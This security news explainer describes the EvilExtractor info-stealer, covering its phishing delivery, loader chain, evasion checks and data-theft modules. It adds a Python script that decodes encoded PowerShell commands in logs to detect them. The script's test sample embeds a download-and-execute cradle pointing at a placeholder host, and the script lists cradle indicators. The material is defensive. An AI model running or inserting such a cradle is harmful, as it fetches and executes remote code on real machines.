The attack tool known as Evil Extractor, developed by a company called Kodex as an “educational tool,” has been used by threat actors to target Windows-based machines.
What Is EvilExtractor?
EvilExtractor malware affects Windows systems, and attackers use it mainly to steal browser data and other sensitive information. Kodex released the malware in October 2022 and has been updating it since.
Further, Evil Extractor contains environment checking as well as anti-virtual-machine (VM) and VirusTotal capabilities designed to avoid detection. The malware also has a ransomware function called “Kodex Ransomware.”
Most infections were caused by a phishing campaign in which attackers dropped a Python executable. Fortinet discovered several attacks masquerading as account confirmation requests, each carrying a gzip-compressed executable attachment. The executable is designed to look like a legitimate PDF or Dropbox file.
When the target opens the file, a PyInstaller-packaged file runs, which launches a .NET loader; that loader in turn launches the EvilExtractor executable by way of a base64-encoded PowerShell script.
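The base64-encoded PowerShell step in that chain is the point a defender can most easily observe in process-creation telemetry. As an added example (not code from the original report, from Fortinet, or from Kodex), the following Python scans constructed process-creation log lines for a PowerShell launch that uses -EncodedCommand, decodes the UTF-16LE payload PowerShell expects, and reports which suspicious strings the decoded script contains; the log format, the loader path and the sample script are assumptions.

```python
import base64
import re
from typing import Optional

# PowerShell accepts -EncodedCommand and its short forms (-e, -ec, -en, -enc);
# the argument is base64 over UTF-16LE text, which is what we decode below.
ENCODED_SWITCH = re.compile(
    r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")
POWERSHELL = re.compile(r'(?i)(?:^|[\\/\s"])(?:powershell|pwsh)(?:\.exe)?\b')
# Strings worth escalating on once the hidden script is readable.
INDICATORS = ("Net.WebClient", "DownloadString", "DownloadFile",
              "Invoke-Expression", "IEX", "FromBase64String")

def decode_encoded_command(b64: str) -> Optional[str]:
    """Decode an -EncodedCommand payload; None if not valid base64/UTF-16LE."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def inspect_command_line(cmdline: str) -> Optional[dict]:
    """Flag a PowerShell launch that hides its script behind -EncodedCommand."""
    if not POWERSHELL.search(cmdline):
        return None
    m = ENCODED_SWITCH.search(cmdline)
    decoded = decode_encoded_command(m.group(1)) if m else None
    if decoded is None:
        return None
    hits = [i for i in INDICATORS if i.lower() in decoded.lower()]
    return {"decoded": decoded, "indicators": hits}

def scan_log(lines):
    """Assumed event format: '<time> ParentImage=<path> CommandLine=<text>'."""
    findings = []
    for line in lines:
        cmd = re.search(r"CommandLine=(.*)$", line)
        finding = inspect_command_line(cmd.group(1)) if cmd else None
        if finding:
            parent = re.search(r"ParentImage=(\S+)", line)
            finding["parent"] = parent.group(1) if parent else None
            findings.append(finding)
    return findings

# Constructed sample: a loader dropped to Temp spawning PowerShell with an
# encoded download cradle (hypothetical path and URL, not real indicators).
SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p')"
ENCODED = base64.b64encode(SCRIPT.encode("utf-16-le")).decode()
SAMPLE_LOG = [
    "2023-04-20T10:00:01Z ParentImage=C:\\Windows\\explorer.exe CommandLine=notepad.exe",
    "2023-04-20T10:00:02Z ParentImage=C:\\Users\\u\\AppData\\Local\\Temp\\loader.exe "
    f"CommandLine=powershell.exe -w hidden -NoP -enc {ENCODED}",
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["parent"], f["indicators"], f["decoded"], sep=" | ")
```

In production the same decode step would run on the command line field of Sysmon Event ID 1 or Windows Security 4688 events, with the parent image used to separate administrative use from a launch out of a user-writable directory.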
The following modules are part of the EvilExtractor version used in these attacks:
- Date time checking
- FTP server setting
- Steal data
- Upload stolen data
- Clear log
“Users should be aware of this new info stealer and continue to be cautious about suspicious mail.”